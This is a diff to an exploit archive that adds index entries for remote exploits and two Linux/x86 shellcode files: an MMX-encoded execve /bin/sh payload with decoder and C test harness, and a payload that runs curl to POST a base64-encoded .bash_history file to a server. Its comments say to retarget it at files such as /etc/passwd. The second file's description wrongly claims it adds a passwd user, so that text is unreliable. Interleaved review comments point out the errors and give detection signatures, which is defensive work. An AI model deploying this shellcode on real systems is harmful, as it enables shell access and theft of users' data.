 46653,exploits/multiple/dos/46653.html,"Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion",2019-04-03,"Google Security Research",dos,multiple,
 46656,exploits/windows/dos/46656.py,"Magic ISO Maker 5.5(build 281) - 'Serial Code' Denial of Service (PoC)",2019-04-04,"Alejandra Sánchez",dos,windows,
+46702,exploits/windows/dos/46702.py,"UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC)",2019-04-15,"Victor Mondragón",dos,windows,
+46703,exploits/windows/dos/46703.py,"UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)",2019-04-15,"Victor Mondragón",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17315,6 +17317,13 @@ id,file,description,date,author,type,platform,port
 46678,exploits/hardware/remote/46678.py,"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow",2019-04-09,"Grzegorz Wypych",remote,hardware,80
 46682,exploits/multiple/remote/46682.py,"Apache Axis 1.4 - Remote Code Execution",2019-04-09,"David Yesland",remote,multiple,
 46693,exploits/linux/remote/46693.rb,"Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)",2019-04-12,Metasploit,remote,linux,8443
+46695,exploits/windows/remote/46695.py,"MailCarrier 2.51 - 'RCPT TO' Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,25
+46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows,
+46698,exploits/php/remote/46698.rb,"CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)",2019-04-15,AkkuS,remote,php,
+46699,exploits/windows/remote/46699.py,"MailCarrier 2.51 - POP3 'USER' Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
+46700,exploits/windows/remote/46700.py,"MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
+46701,exploits/windows/remote/46701.py,"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
+46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41116,6 +41125,7 @@ id,file,description,date,author,type,platform,port
 46643,exploits/php/webapps/46643.txt,"Ashop Shopping Cart Software - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80
 46644,exploits/php/webapps/46644.txt,"PhreeBooks ERP 5.2.3 - Arbitrary File Upload",2019-04-03,"Abdullah Çelebi",webapps,php,80
 46658,exploits/php/webapps/46658.py,"FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)",2019-04-04,"Yilmaz Degirmenci",webapps,php,80
+46659,exploits/jsp/webapps/46659.py,"Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation",2019-04-05,"Ata Hakçıl_ Melih Kaan Yıldız",webapps,jsp,
 46661,exploits/php/webapps/46661.html,"WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery",2019-04-05,"Peyman Forouzan",webapps,php,
 46663,exploits/php/webapps/46663.txt,"Jobgator - 'experience' SQL Injection",2019-04-08,"Ahmet Ümit BAYRAM",webapps,php,80
 46664,exploits/php/webapps/46664.html,"Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution",2019-04-08,FelipeGaspar,webapps,php,80
@@ -41129,3 +41139,4 @@ id,file,description,date,author,type,platform,port
 46684,exploits/php/webapps/46684.py,"Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution",2019-04-10,"Julien Ahrens",webapps,php,443
 46687,exploits/hardware/webapps/46687.txt,"D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting",2019-04-10,"Semen Alexandrovich Lyhin",webapps,hardware,80
 46691,exploits/php/webapps/46691.rb,"ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)",2019-04-12,AkkuS,webapps,php,
+46694,exploits/php/webapps/46694.txt,"DirectAdmin 1.561 - Multiple Vulnerabilities",2019-04-15,InfinitumIT,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index b5d930617..50c4f5635 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -955,3 +955,5 @@ id,file,description,date,author,type,platform
 46679,shellcodes/generator/46679.nasm,"Linux/x64 - XANAX Encoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
 46680,shellcodes/generator/46680.nasm,"Linux/x64 - XANAX Decoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
 46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
+46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator
+46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
diff --git a/shellcodes/generator/46696.py b/shellcodes/generator/46696.py
new file mode 100755
index 000000000..007d62403
--- /dev/null
+++ b/shellcodes/generator/46696.py
@@ -0,0 +1,109 @@ +################################################################################ +INTRO +################################################################################ + +# Exploit Title: MMX-PUNPCKLBW Encoder +# Description: Payload encoder using MMX PUNPCKLBW instruction +# Date: 13/04/2019 +# Exploit Author: Petr Javorik +# Tested on: Linux ubuntu 3.13.0-32-generic x86 +# Shellcode length: 61 + +################################################################################ +ENCODER +################################################################################ + +#!/usr/bin/env python + +# stack execve +SHELLCODE = bytearray( + b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' +) + +# Align to qword multiples +missing_bytes = 8 - (len(SHELLCODE) % 8) +padding = [0x90 for _ in range(missing_bytes)] +SHELLCODE.extend(padding) + +# Shuffle payload +shuffled_payload = [] +# First byte carries count of needed PUNPCKLBW loops +loop_count = len(SHELLCODE)//8 +shuffled_payload.append(loop_count) +for block_num in range(0, loop_count): + current_block = SHELLCODE[(8 * block_num) : (8 * block_num + 8)] + shuffled_block = [current_block[i] for i in [0, 2, 4, 6, 1, 3, 5, 7]] + shuffled_payload.extend(shuffled_block) + +# Remove trailing NOPS +for byte in shuffled_payload[::-1]: + if byte == 0x90: + del shuffled_payload[-1] + else: + break + +# Print shellcode +print('Payload length: {}'.format(len(shuffled_payload))) +print('\\x' + '\\x'.join('{:02x}'.format(byte) for byte in shuffled_payload)) +print('0x' + ',0x'.join('{:02x}'.format(byte) for byte in shuffled_payload)) + +################################################################################ +DECODER +################################################################################ + +global _start + +section .text +_start: + + jmp short call_decoder + +decoder: + + pop edi + xor ecx, ecx + mov cl, [edi] + inc edi + mov esi, edi + 
+decode: + + movq mm0, qword [edi] + movq mm1, qword [edi +4] + punpcklbw mm0, mm1 + movq qword [edi], mm0 + add edi, 0x8 + loop decode + jmp esi + +call_decoder: + + call decoder + EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80 + +################################################################################ +TESTING +################################################################################ + +#include +#include + +unsigned char code[] = \ +"\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff\x04\x31\x50\x2f\x73\xc0\x68\x2f\x68\x68\x62\x6e\xe3\x2f\x69\x89\x50\x89\x53\xe1\x0b\xe2\x89\xb0\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*CodeFun)() = (int(*)())code; + CodeFun(); +} + +################################################################################ + + +Kind Regards +------------------------------ + +Bc. Petr Javorik +www.mmquant.net + maple@mmquant.net \ No newline at end of file diff --git a/shellcodes/linux_x86/46704.txt b/shellcodes/linux_x86/46704.txt new file mode 100644 index 000000000..f0dd531a6 --- /dev/null +++ b/shellcodes/linux_x86/46704.txt 
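Review bot: As committed the `.py` file cannot be run as Python — `INTRO`, `ENCODER`, `DECODER` and `TESTING` stand as bare names between the `#` banners instead of comments, `#!/usr/bin/env python` sits mid-file rather than on line 1, and the nasm decoder (`section .text`, `_start:`) and the C harness that follow the encoder are not commented out, so as far as I can tell the interpreter rejects the file at compile time before the encoder executes. Either keep the three parts in separate files or wrap the non-Python sections in `#` comments or a module-level triple-quoted string, and add a header line such as `# Usage: python 46696.py -> prints the encoded payload; the decoder stub below is nasm, the harness is C`. Both `#include` lines of the C harness read `#include` with no header name, presumably lost in extraction, and should be restored to the headers the harness needs for `printf` and `strlen`. For detection, the decoder stub in front of the count byte (`\xeb\x1c\x5f\x31\xc9\x8a\x0f\x47\x89\xfe\x0f\x6f\x07\x0f\x6f\x4f\x04\x0f\x60\xc1\x0f\x7f\x07\x83\xc7\x08\xe2\xee\xff\xe6\xe8\xdf\xff\xff\xff`) appears to be constant across payloads, with only the count byte and the encoded body varying, so it is the part worth signaturing; a comment saying so would help readers of the archive.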
@@ -0,0 +1,76 @@ +# Exploit Title: Linux/x86 cat file encode to base64 and post via curl to webserver (125 bytes) +# Google Dork: None +# Date: 11.04.2019 +# Exploit Author: strider +# Vendor Homepage: None +# Software Link: None +# Tested on: Debian 9 Stretch i386/ Kali Linux i386 +# CVE : None +# Shellcode Length: 125 +------------------------------[Description]--------------------------------- + +This shellcode writes a new user to the given passwd file + +Username = sshd +password = root +Shell = sh + +-----------------------------[Shellcode Dump]--------------------------------- +section .text + +global _start + +_start: + xor eax, eax + push eax + jmp short _cmd + +_build: + pop ecx + mov edi, ecx + xor ecx, ecx + push eax + push 0x68732f6e + push 0x69622f2f + +_param: + mov ebx, esp + push eax + push word 0x632d + mov esi, esp + +_exec: + push eax + push edi + push esi + push ebx + + mov ecx, esp + mov al, 11 + int 0x80 + +_cmd: + call _build + msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST", 0x0a + ; decoded url = curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST + ;change url to your server + ; change file to you target file like /etc/passwd + + + -----------------------------[Compile]--------------------------------------------- + gcc -m32 -fno-stack-protector -z execstack -o tester tester.c + + -----------------------------[C-Code]----------------------------- + + #include + #include + + unsigned char shellcode[] = 
"\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30\x20\x2d\x64\x20\x27\x64\x61\x74\x61\x3d\x27\x24\x28\x63\x61\x74\x20\x2e\x62\x61\x73\x68\x5f\x68\x69\x73\x74\x6f\x72\x79\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x77\x20\x30\x29\x20\x2d\x58\x20\x50\x4f\x53\x54\x0a"; + + void main() + { + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int (*ret)() = (int(*)())shellcode; + ret(); + } \ No newline at end of file
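Review bot: The `[Description]` block describes a different shellcode — `This shellcode writes a new user to the given passwd file` with `Username = sshd`, `password = root`, `Shell = sh` matches the title of the author's passwd entry 46689 in files_shellcodes.csv, whereas this payload, per its own `msg db` line and the `push 0x68732f6e` / `push 0x69622f2f` / `push word 0x632d` sequence, execs `//bin/sh -c` with `curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST`. Replace those five lines with a description of what the code actually does, e.g. `Spawns /bin/sh -c to read a file (.bash_history by default), base64-encode it and POST it to the URL in msg; edit msg to change the URL and the file`. Both `#include` lines in the C harness have lost their header names, as in 46696. For defenders, the observables are a shell spawned with `-c curl ... -d 'data='... base64 -w 0 ... -X POST` and an outbound HTTP POST carrying a base64 body, both straightforward to alert on in process auditing and egress logs.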